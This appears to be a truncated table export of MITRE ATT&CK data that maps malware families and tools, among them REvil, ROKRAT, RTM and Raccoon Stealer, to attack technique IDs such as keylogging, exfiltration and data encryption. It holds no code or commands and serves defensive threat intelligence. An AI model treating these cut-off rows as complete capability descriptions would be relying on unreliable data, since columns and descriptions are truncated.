S0262 QuasarRATtool--da04 software uses T1571 Non-Standaattack-pat technique [QuasarRAT
S0262 QuasarRATtool--da04 software uses T1090 Proxy attack-pat technique [QuasarRAT
S0262 QuasarRATtool--da04 software uses T1547.001Registry Ruattack-pat technique If the [Qua
S0262 QuasarRATtool--da04 software uses T1021.001Remote Des attack-pat technique [QuasarRAT
S0262 QuasarRATtool--da04 software uses T1053.005Scheduled attack-pat technique [QuasarRAT
S0262 QuasarRATtool--da04 software uses T1573.001Symmetric attack-pat technique [QuasarRAT
S0262 QuasarRATtool--da04 software uses T1082 System Inf attack-pat technique [QuasarRAT
S0262 QuasarRATtool--da04 software uses T1614 System Locattack-pat technique [QuasarRAT
S0262 QuasarRATtool--da04 software uses T1016 System Netattack-pat technique [QuasarRAT]
S0262 QuasarRATtool--da04 software uses T1033 System Own attack-pat technique [QuasarRAT
S0262 QuasarRATtool--da04 software uses T1125 Video Captattack-pat technique [QuasarRAT
S0262 QuasarRATtool--da04 software uses T1059.003Windows Cattack-pat technique [QuasarRAT
S0686 QuietSievemalware-- software uses T1005 Data from attack-pat technique [QuietSieve
S0686 QuietSievemalware-- software uses T1083 File and Di attack-pat technique [QuietSieve
S0686 QuietSievemalware-- software uses T1564.003Hidden Wi attack-pat technique [QuietSieve
S0686 QuietSievemalware-- software uses T1105 Ingress Tooattack-pat technique [QuietSieve
S0686 QuietSievemalware-- software uses T1016.001Internet C attack-pat technique [QuietSieve
S0686 QuietSievemalware-- software uses T1135 Network Shattack-pat technique [QuietSieve
S0686 QuietSievemalware-- software uses T1120 Peripheral attack-pat technique [QuietSieve
S0686 QuietSievemalware-- software uses T1113 Screen Capattack-pat technique [QuietSiev
S0686 QuietSievemalware-- software uses T1071.001Web Protocattack-pat technique [QuietSiev
S1113 RAPIDPULSmalware-- software uses T1005 Data from attack-pat technique [RAPIDPULS
S1113 RAPIDPULSmalware-- software uses T1140 Deobfuscatattack-pat technique [RAPIDPULS
S1113 RAPIDPULSmalware-- software uses T1027.013Encrypted/attack-pat technique [RAPIDPULS
S1113 RAPIDPULSmalware-- software uses T1505.003Web Shell attack-pat technique [RAPIDPULSE
S0055 RARSTONEmalware-- software uses T1055.001Dynamic-linattack-pat technique After decry
S0055 RARSTONEmalware-- software uses T1083 File and Di attack-pat technique [RARSTONE](
S0055 RARSTONEmalware-- software uses T1105 Ingress Tooattack-pat technique [RARSTONE]
S0055 RARSTONEmalware-- software uses T1095 Non-Applicattack-pat technique [RARSTONE]
S0241 RATANKBAmalware-- software uses T1055.001Dynamic-linattack-pat technique [RATANKBA](
S0241 RATANKBAmalware-- software uses T1105 Ingress Tooattack-pat technique [RATANKBA]
S0241 RATANKBAmalware-- software uses T1087.001Local Acco attack-pat technique [RATANKBA]
S0241 RATANKBAmalware-- software uses T1059.001PowerShellattack-pat technique There is a
S0241 RATANKBAmalware-- software uses T1057 Process Di attack-pat technique [RATANKBA]
S0241 RATANKBAmalware-- software uses T1012 Query Regiattack-pat technique [RATANKBA]
S0241 RATANKBAmalware-- software uses T1018 Remote Sysattack-pat technique [RATANKBA]
S0241 RATANKBAmalware-- software uses T1082 System Inf attack-pat technique [RATANKBA]
S0241 RATANKBAmalware-- software uses T1016 System Netattack-pat technique [RATANKBA]
S0241 RATANKBAmalware-- software uses T1049 System Netattack-pat technique [RATANKBA]
S0241 RATANKBAmalware-- software uses T1033 System Own attack-pat technique [RATANKBA]
S0241 RATANKBAmalware-- software uses T1007 System Serattack-pat technique [RATANKBA]
S0241 RATANKBAmalware-- software uses T1071.001Web Protocattack-pat technique [RATANKBA]
S0241 RATANKBAmalware-- software uses T1059.003Windows Cattack-pat technique [RATANKBA]
S0241 RATANKBAmalware-- software uses T1047 Windows M attack-pat technique [RATANKBA]
S0662 RCSession malware-- software uses T1548.002Bypass Useattack-pat technique [RCSession]
S0662 RCSession malware-- software uses T1574.002DLL Side-L attack-pat technique [RCSession
S0662 RCSession malware-- software uses T1005 Data from attack-pat technique [RCSession
S0662 RCSession malware-- software uses T1573 Encrypted attack-pat technique [RCSession
S0662 RCSession malware-- software uses T1027.013Encrypted/attack-pat technique [RCSession
S0662 RCSession malware-- software uses T1070.004File Deleti attack-pat technique [RCSession
S0662 RCSession malware-- software uses T1027.011Fileless St attack-pat technique [RCSession
S0662 RCSession malware-- software uses T1105 Ingress Tooattack-pat technique [RCSession]
S0662 RCSession malware-- software uses T1056.001Keyloggingattack-pat technique [RCSession
S0662 RCSession malware-- software uses T1036 Masqueradattack-pat technique [RCSession
S0662 RCSession malware-- software uses T1112 Modify Regattack-pat technique [RCSession]
S0662 RCSession malware-- software uses T1218.007Msiexec attack-pat technique [RCSession]
S0662 RCSession malware-- software uses T1106 Native API attack-pat technique [RCSession
S0662 RCSession malware-- software uses T1095 Non-Applicattack-pat technique [RCSession
S0662 RCSession malware-- software uses T1057 Process Di attack-pat technique [RCSession
S0662 RCSession malware-- software uses T1055.012Process Hoattack-pat technique [RCSession
S0662 RCSession malware-- software uses T1547.001Registry Ruattack-pat technique [RCSession]
S0662 RCSession malware-- software uses T1113 Screen Capattack-pat technique [RCSession
S0662 RCSession malware-- software uses T1082 System Inf attack-pat technique [RCSession
S0662 RCSession malware-- software uses T1033 System Own attack-pat technique [RCSession]
S0662 RCSession malware-- software uses T1071.001Web Protocattack-pat technique [RCSession
S0662 RCSession malware-- software uses T1059.003Windows Cattack-pat technique [RCSession
S0495 RDAT malware--4software uses T1071.004DNS attack-pat technique [RDAT](htt
S0495 RDAT malware--4software uses T1001 Data Obfusattack-pat technique [RDAT](htt
S0495 RDAT malware--4software uses T1030 Data Transfattack-pat technique [RDAT](http
S0495 RDAT malware--4software uses T1140 Deobfuscatattack-pat technique [RDAT](htt
S0495 RDAT malware--4software uses T1041 Exfiltratio attack-pat technique [RDAT](http
S0495 RDAT malware--4software uses T1008 Fallback C attack-pat technique [RDAT](htt
S0495 RDAT malware--4software uses T1070.004File Deleti attack-pat technique [RDAT](http
S0495 RDAT malware--4software uses T1105 Ingress Tooattack-pat technique [RDAT](http
S0495 RDAT malware--4software uses T1071.003Mail Protocattack-pat technique [RDAT](htt
S0495 RDAT malware--4software uses T1036.004Masquerade attack-pat technique [RDAT](http
S0495 RDAT malware--4software uses T1036.005Match Legiattack-pat technique [RDAT](htt
S0495 RDAT malware--4software uses T1132.002Non-Standaattack-pat technique [RDAT](http
S0495 RDAT malware--4software uses T1113 Screen Capattack-pat technique [RDAT](http
S0495 RDAT malware--4software uses T1132.001Standard Eattack-pat technique [RDAT](htt
S0495 RDAT malware--4software uses T1027.003Steganogr attack-pat technique [RDAT](http
S0495 RDAT malware--4software uses T1001.002Steganogr attack-pat technique [RDAT](htt
S0495 RDAT malware--4software uses T1573.001Symmetric attack-pat technique [RDAT](htt
S0495 RDAT malware--4software uses T1071.001Web Protocattack-pat technique [RDAT](http
S0495 RDAT malware--4software uses T1059.003Windows Cattack-pat technique [RDAT](htt
S0495 RDAT malware--4software uses T1543.003Windows Se attack-pat technique [RDAT](http
S0416 RDFSNIFFEmalware-- software uses T1056.004Credential attack-pat technique [RDFSNIFFE
S0416 RDFSNIFFEmalware-- software uses T1070.004File Deleti attack-pat technique [RDFSNIFFER
S0416 RDFSNIFFEmalware-- software uses T1106 Native API attack-pat technique [RDFSNIFFER
S0496 REvil malware--asoftware uses T1573.002Asymmetricattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1134.002Create Proattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1485 Data Destrattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1486 Data Encryattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1140 Deobfuscatattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1562.001Disable or attack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1069.002Domain Grattack-pat technique [REvil](ht
S0496 REvil malware--asoftware uses T1189 Drive-by C attack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1027.013Encrypted/attack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1041 Exfiltratio attack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1070.004File Deleti attack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1083 File and Di attack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1027.011Fileless St attack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1105 Ingress Tooattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1490 Inhibit Sy attack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1204.002Malicious Fattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1036.005Match Legiattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1112 Modify Regattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1480.002Mutual Excattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1106 Native API attack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1059.001PowerShellattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1055 Process Injattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1012 Query Regiattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1562.009Safe Modeattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1489 Service Stoattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1566.001Spearphishattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1082 System Inf attack-pat technique [REvil](ht
[REvil](https://attack.mitre.o
S0496 REvil malware--asoftware uses T1614.001System Lanattack-pat technique
S0496 REvil malware--asoftware uses T1007 System Serattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1134.001Token Impeattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1059.005Visual Basiattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1071.001Web Protocattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1059.003Windows Cattack-pat technique [REvil](htt
S0496 REvil malware--asoftware uses T1047 Windows M attack-pat technique [REvil](htt
S0258 RGDoor malware-- software uses T1560.003Archive vi attack-pat technique [RGDoor](ht
S0258 RGDoor malware-- software uses T1140 Deobfuscatattack-pat technique [RGDoor](ht
S0258 RGDoor malware-- software uses T1505.004IIS Componattack-pat technique [RGDoor](ht
S0258 RGDoor malware-- software uses T1105 Ingress Tooattack-pat technique [RGDoor](ht
S0258 RGDoor malware-- software uses T1033 System Own attack-pat technique [RGDoor](h
S0258 RGDoor malware-- software uses T1071.001Web Protocattack-pat technique [RGDoor](h
S0258 RGDoor malware-- software uses T1059.003Windows Cattack-pat technique [RGDoor](h
S0003 RIPTIDE malware--asoftware uses T1573.001Symmetric attack-pat technique [APT12](ht
S0003 RIPTIDE malware--asoftware uses T1071.001Web Protocattack-pat technique [APT12](ht
S1150 ROADSWEEmalware-- software uses T1553.002Code Signi attack-pat technique [ROADSWEEP
S1150 ROADSWEEmalware-- software uses T1486 Data Encryattack-pat technique [ROADSWEEP
S1150 ROADSWEEmalware-- software uses T1140 Deobfuscatattack-pat technique [ROADSWEEP
S1150 ROADSWEEmalware-- software uses T1027.013Encrypted/attack-pat technique [ROADSWEEP](https://attack
The [ROADS
S1150 ROADSWEEmalware-- software uses T1480 Execution attack-pat technique
S1150 ROADSWEEmalware-- software uses T1070.004File Deleti attack-pat technique [ROADSWEEP
S1150 ROADSWEEmalware-- software uses T1083 File and Di attack-pat technique [ROADSWEEP]
S1150 ROADSWEEmalware-- software uses T1490 Inhibit Sy attack-pat technique [ROADSWEEP
S1150 ROADSWEEmalware-- software uses T1559 Inter-Proc attack-pat technique [ROADSWEEP
[ROADSWEEP](https://attack
S1150 ROADSWEEmalware-- software uses T1491.001Internal D attack-pat technique
S1150 ROADSWEEmalware-- software uses T1120 Peripheral attack-pat technique [ROADSWEEP
S1150 ROADSWEEmalware-- software uses T1547.001Registry Ruattack-pat technique [ROADSWEEP
S1150 ROADSWEEmalware-- software uses T1489 Service Stoattack-pat technique [ROADSWEEP
[ROADSWEEP](https://attack
S1150 ROADSWEEmalware-- software uses T1082 System Inf attack-pat technique
S1150 ROADSWEEmalware-- software uses T1059.003Windows Cattack-pat technique [ROADSWEEP
S0684 ROADToolstool--6dbdsoftware uses T1119 Automatedattack-pat technique [ROADTools
S0684 ROADToolstool--6dbdsoftware uses T1087.004Cloud Accoattack-pat technique [ROADTools
S0684 ROADToolstool--6dbdsoftware uses T1078.004Cloud Accoattack-pat technique [ROADTools]
S0684 ROADToolstool--6dbdsoftware uses T1069.003Cloud Grouattack-pat technique [ROADTools
S0684 ROADToolstool--6dbdsoftware uses T1526 Cloud Servattack-pat technique [ROADTools]
S0684 ROADToolstool--6dbdsoftware uses T1018 Remote Sysattack-pat technique [ROADTools
S0112 ROCKBOOTmalware--csoftware uses T1542.003Bootkit attack-pat technique [ROCKBOOT](
S0240 ROKRAT malware--6software uses T1010 Applicatio attack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1123 Audio Captattack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1102.002Bidirectio attack-pat technique [ROKRAT](ht
S0240 ROKRAT malware--6software uses T1115 Clipboard attack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1555.003Credential attack-pat technique [ROKRAT](ht
S0240 ROKRAT malware--6software uses T1005 Data from attack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1622 Debugger Eattack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1140 Deobfuscatattack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1480.001Environmen attack-pat technique [ROKRAT](ht
S0240 ROKRAT malware--6software uses T1041 Exfiltratio attack-pat technique [ROKRAT](ht
S0240 ROKRAT malware--6software uses T1567.002Exfiltratio attack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1070.004File Deleti attack-pat technique [ROKRAT](ht
S0240 ROKRAT malware--6software uses T1083 File and Di attack-pat technique [ROKRAT](ht
S0240 ROKRAT malware--6software uses T1105 Ingress Tooattack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1056.001Keyloggingattack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1204.002Malicious Fattack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1112 Modify Regattack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1106 Native API attack-pat technique [ROKRAT](ht
S0240 ROKRAT malware--6software uses T1027 Obfuscatedattack-pat technique [ROKRAT](ht
S0240 ROKRAT malware--6software uses T1057 Process Di attack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1055 Process Injattack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1012 Query Regiattack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1113 Screen Capattack-pat technique [ROKRAT](ht
S0240 ROKRAT malware--6software uses T1566.001Spearphishattack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1497.001System Cheattack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1082 System Inf attack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1033 System Own attack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1059.005Visual Basiattack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1071.001Web Protocattack-pat technique [ROKRAT](h
S0240 ROKRAT malware--6software uses T1555.004Windows Cattack-pat technique [ROKRAT](h
S0148 RTM malware-- software uses T1119 Automatedattack-pat technique [RTM](https
S0148 RTM malware-- software uses T1548.002Bypass Useattack-pat technique [RTM](https
S0148 RTM malware-- software uses T1070.009Clear Persiattack-pat technique [RTM](https
S0148 RTM malware-- software uses T1115 Clipboard attack-pat technique [RTM](http
S0148 RTM malware-- software uses T1553.002Code Signi attack-pat technique [RTM](https
S0148 RTM malware-- software uses T1102.001Dead Dropattack-pat technique [RTM](https
S0148 RTM malware-- software uses T1559.002Dynamic Daattack-pat technique [RTM](http
S0148 RTM malware-- software uses T1568 Dynamic Reattack-pat technique [RTM](https
S0148 RTM malware-- software uses T1070.004File Deleti attack-pat technique [RTM](https
S0148 RTM malware-- software uses T1083 File and Di attack-pat technique [RTM](https
S0148 RTM malware-- software uses T1105 Ingress Tooattack-pat technique [RTM](http
S0148 RTM malware-- software uses T1553.004Install Rootattack-pat technique [RTM](http
S0148 RTM malware-- software uses T1056.001Keyloggingattack-pat technique [RTM](http
S0148 RTM malware-- software uses T1204.002Malicious Fattack-pat technique [RTM](https
S0148 RTM malware-- software uses T1036.004Masquerade attack-pat technique [RTM](http
S0148 RTM malware-- software uses T1036 Masqueradattack-pat technique [RTM](http
S0148 RTM malware-- software uses T1112 Modify Regattack-pat technique [RTM](https
S0148 RTM malware-- software uses T1106 Native API attack-pat technique [RTM](http
S0148 RTM malware-- software uses T1571 Non-Standaattack-pat technique [RTM](http
S0148 RTM malware-- software uses T1027 Obfuscatedattack-pat technique [RTM](https
S0148 RTM malware-- software uses T1120 Peripheral attack-pat technique [RTM](https
S0148 RTM malware-- software uses T1057 Process Di attack-pat technique [RTM](https
S0148 RTM malware-- software uses T1547.001Registry Ruattack-pat technique [RTM](http
S0148 RTM malware-- software uses T1219 Remote Accattack-pat technique [RTM](http
S0148 RTM malware-- software uses T1218.011Rundll32 attack-pat technique [RTM](https
S0148 RTM malware-- software uses T1053.005Scheduled attack-pat technique [RTM](https
S0148 RTM malware-- software uses T1113 Screen Capattack-pat technique [RTM](http
S0148 RTM malware-- software uses T1518.001Security S attack-pat technique [RTM](https
S0148 RTM malware-- software uses T1518 Software Dattack-pat technique [RTM](https
S0148 RTM malware-- software uses T1566.001Spearphishattack-pat technique [RTM](http
S0148 RTM malware-- software uses T1573.001Symmetric attack-pat technique [RTM](https
S0148 RTM malware-- software uses T1082 System Inf attack-pat technique [RTM](https
S0148 RTM malware-- software uses T1033 System Own attack-pat technique [RTM](http
S0148 RTM malware-- software uses T1124 System Timattack-pat technique [RTM](https
S0148 RTM malware-- software uses T1497 Virtualiza attack-pat technique [RTM](https
S0148 RTM malware-- software uses T1071.001Web Protocattack-pat technique [RTM](https
S0148 RTM malware-- software uses T1059.003Windows Cattack-pat technique [RTM](http
S1148 Raccoon Stmalware--bsoftware uses T1560 Archive Coattack-pat technique [Raccoon St
S1148 Raccoon Stmalware--bsoftware uses T1119 Automatedattack-pat technique [Raccoon S
S1148 Raccoon Stmalware--bsoftware uses T1020 Automatedattack-pat technique [Raccoon St
S1148 Raccoon Stmalware--bsoftware uses T1555.003Credential attack-pat technique [Raccoon S
S1148 Raccoon Stmalware--bsoftware uses T1213 Data from attack-pat technique [Raccoon St
S1148 Raccoon Stmalware--bsoftware uses T1005 Data from attack-pat technique [Raccoon S
S1148 Raccoon Stmalware--bsoftware uses T1140 Deobfuscatattack-pat technique [Raccoon S
S1148 Raccoon Stmalware--bsoftware uses T1027.007Dynamic APattack-pat technique [Raccoon St
S1148 Raccoon Stmalware--bsoftware uses T1027.013Encrypted/attack-pat technique [Raccoon St
S1148 Raccoon Stmalware--bsoftware uses T1041 Exfiltratio attack-pat technique [Raccoon St
S1148 Raccoon Stmalware--bsoftware uses T1070.004File Deleti attack-pat technique [Raccoon St
S1148 Raccoon Stmalware--bsoftware uses T1083 File and Di attack-pat technique [Raccoon St
S1148 Raccoon Stmalware--bsoftware uses T1105 Ingress Tooattack-pat technique [Raccoon St
S1148 Raccoon Stmalware--bsoftware uses T1087.001Local Acco attack-pat technique [Raccoon St
S1148 Raccoon Stmalware--bsoftware uses T1012 Query Regiattack-pat technique [Raccoon S
S1148 Raccoon Stmalware--bsoftware uses T1113 Screen Capattack-pat technique [Raccoon S
S1148 Raccoon Stmalware--bsoftware uses T1518 Software Dattack-pat technique [Raccoon St
S1148 Raccoon Stmalware--bsoftware uses T1539 Steal Web attack-pat technique [Raccoon St
S1148 Raccoon Stmalware--bsoftware uses T1195 Supply Chaattack-pat technique [Raccoon S
S1148 Raccoon Stmalware--bsoftware uses T1082 System Inf attack-pat technique [Raccoon St
S1148 Raccoon Stmalware--bsoftware uses T1614 System Locattack-pat technique [Raccoon St
S1148 Raccoon Stmalware--bsoftware uses T1033 System Own attack-pat technique [Raccoon S
S1148 Raccoon Stmalware--bsoftware uses T1124 System Timattack-pat technique [Raccoon S
S1148 Raccoon Stmalware--bsoftware uses T1071.001Web Protocattack-pat technique [Raccoon S
S0481 Ragnar Locmalware-- software uses T1486 Data Encryattack-pat technique [Ragnar Loc
S0481 Ragnar Locmalware-- software uses T1562.001Disable or attack-pat technique [Ragnar Lo
S0481 Ragnar Locmalware-- software uses T1490 Inhibit Sy attack-pat technique [Ragnar Lo
S0481 Ragnar Locmalware-- software uses T1218.007Msiexec attack-pat technique [Ragnar Lo
S0481 Ragnar Locmalware-- software uses T1120 Peripheral attack-pat technique [Ragnar Lo
S0481 Ragnar Locmalware-- software uses T1218.010Regsvr32 attack-pat technique [Ragnar Lo
S0481 Ragnar Locmalware-- software uses T1564.006Run Virtualattack-pat technique [Ragnar Loc
S0481 Ragnar Locmalware-- software uses T1218.011Rundll32 attack-pat technique [Ragnar Lo
S0481 Ragnar Locmalware-- software uses T1569.002Service Ex attack-pat technique [Ragnar Loc
S0481 Ragnar Locmalware-- software uses T1489 Service Stoattack-pat technique [Ragnar Loc
S0481 Ragnar Locmalware-- software uses T1614 System Locattack-pat technique Before exec
S0481 Ragnar Locmalware-- software uses T1059.003Windows Cattack-pat technique [Ragnar Lo
S0481 Ragnar Locmalware-- software uses T1543.003Windows Se attack-pat technique [Ragnar Loc
S0565 Raindrop malware-- software uses T1140 Deobfuscatattack-pat technique [Raindrop](
S0565 Raindrop malware-- software uses T1027.013Encrypted/attack-pat technique [Raindrop](
S0565 Raindrop malware-- software uses T1036 Masqueradattack-pat technique [Raindrop](
S0565 Raindrop malware-- software uses T1036.005Match Legiattack-pat technique [Raindrop]
S0565 Raindrop malware-- software uses T1027.002Software Pattack-pat technique [Raindrop](
S0565 Raindrop malware-- software uses T1027.003Steganogr attack-pat technique [Raindrop](
S0565 Raindrop malware-- software uses T1497.003Time Basedattack-pat technique After initi
S0629 RainyDay malware-- software uses T1555.003Credential attack-pat technique [RainyDay](
S0629 RainyDay malware-- software uses T1574.002DLL Side-L attack-pat technique [RainyDay](
S0629 RainyDay malware-- software uses T1005 Data from attack-pat technique [RainyDay](
S0629 RainyDay malware-- software uses T1140 Deobfuscatattack-pat technique [RainyDay](
S0629 RainyDay malware-- software uses T1027.013Encrypted/attack-pat technique [RainyDay]
[RainyDay](https://attack.mit
S0629 RainyDay malware-- software uses T1567.002Exfiltratio attack-pat technique
S0629 RainyDay malware-- software uses T1008 Fallback C attack-pat technique [RainyDay](
S0629 RainyDay malware-- software uses T1070.004File Deleti attack-pat technique [RainyDay](
S0629 RainyDay malware-- software uses T1083 File and Di attack-pat technique [RainyDay](
S0629 RainyDay malware-- software uses T1105 Ingress Tooattack-pat technique [RainyDay](
S0629 RainyDay malware-- software uses T1074.001Local Data attack-pat technique [RainyDay](
S0629 RainyDay malware-- software uses T1036.004Masquerade attack-pat technique [RainyDay]
S0629 RainyDay malware-- software uses T1036.005Match Legiattack-pat technique [RainyDay](
S0629 RainyDay malware-- software uses T1106 Native API attack-pat technique The file co
S0629 RainyDay malware-- software uses T1095 Non-Applicattack-pat technique [RainyDay](
S0629 RainyDay malware-- software uses T1057 Process Di attack-pat technique [RainyDay](
S0629 RainyDay malware-- software uses T1090 Proxy attack-pat technique [RainyDay](
S0629 RainyDay malware-- software uses T1053.005Scheduled attack-pat technique [RainyDay](
S0629 RainyDay malware-- software uses T1113 Screen Capattack-pat technique [RainyDay](
S0629 RainyDay malware-- software uses T1573.001Symmetric attack-pat technique [RainyDay]
S0629 RainyDay malware-- software uses T1007 System Serattack-pat technique [RainyDay](
S0629 RainyDay malware-- software uses T1071.001Web Protocattack-pat technique [RainyDay]
S0629 RainyDay malware-- software uses T1059.003Windows Cattack-pat technique [RainyDay]
S0629 RainyDay malware-- software uses T1555.004Windows Cattack-pat technique [RainyDay]
S0629 RainyDay malware-- software uses T1543.003Windows Se attack-pat technique [RainyDay](
S0458 Ramsay malware--bsoftware uses T1546.010AppInit DL attack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1560.003Archive vi attack-pat technique [Ramsay](h
S0458 Ramsay malware--bsoftware uses T1560.001Archive viaattack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1119 Automatedattack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1548.002Bypass Useattack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1559.001Componentattack-pat technique [Ramsay](h
S0458 Ramsay malware--bsoftware uses T1574.001DLL Searchattack-pat technique [Ramsay](h
S0458 Ramsay malware--bsoftware uses T1005 Data from attack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1039 Data from attack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1025 Data from attack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1140 Deobfuscatattack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1559.002Dynamic Daattack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1055.001Dynamic-linattack-pat technique [Ramsay](h
S0458 Ramsay malware--bsoftware uses T1203 Exploitatioattack-pat technique [Ramsay](h
S0458 Ramsay malware--bsoftware uses T1083 File and Di attack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1074.001Local Data attack-pat technique [Ramsay](h
S0458 Ramsay malware--bsoftware uses T1204.002Malicious Fattack-pat technique [Ramsay](h
S0458 Ramsay malware--bsoftware uses T1036 Masqueradattack-pat technique [Ramsay](h
S0458 Ramsay malware--bsoftware uses T1036.005Match Legiattack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1106 Native API attack-pat technique [Ramsay](h
S0458 Ramsay malware--bsoftware uses T1046 Network Seattack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1135 Network Shattack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1027 Obfuscatedattack-pat technique [Ramsay](h
S0458 Ramsay malware--bsoftware uses T1120 Peripheral attack-pat technique [Ramsay](h
S0458 Ramsay malware--bsoftware uses T1057 Process Di attack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1547.001Registry Ruattack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1091 Replicatio attack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1014 Rootkit attack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1053.005Scheduled attack-pat technique [Ramsay](h
S0458 Ramsay malware--bsoftware uses T1113 Screen Capattack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1566.001Spearphishattack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1132.001Standard Eattack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1027.003Steganogr attack-pat technique [Ramsay](h
S0458 Ramsay malware--bsoftware uses T1082 System Inf attack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1016 System Netattack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1049 System Netattack-pat technique [Ramsay](h
S0458 Ramsay malware--bsoftware uses T1080 Taint Shar attack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1059.005Visual Basiattack-pat technique [Ramsay](ht
S0458 Ramsay malware--bsoftware uses T1071.001Web Protocattack-pat technique [Ramsay](ht
S1130 Raspberry malware--4software uses T1548 Abuse Elevattack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1071 Applicationattack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1548.002Bypass Useattack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1070.009Clear Persiattack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1059 Command attack-pat
an technique [Raspberry
S1130 Raspberry malware--4software uses T1559.001Componentattack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1574.002DLL Side-L attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1622 Debugger Eattack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1140 Deobfuscatattack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1562.001Disable or attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1583.001Domains attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1480 Execution attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1070.004File Deleti attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1083 File and Di attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1574 Hijack Exe attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1105 Ingress Tooattack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1559 Inter-Proc attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1583.008Malvertisi attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1036.008Masquerade attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1036.004Masquerade attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1218.007Msiexec attack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1571 Non-Standaattack-pat technique [Raspberry
S1130 Raspberry malware--4software uses T1027 Obfuscatedattack-pat technique [Raspberry
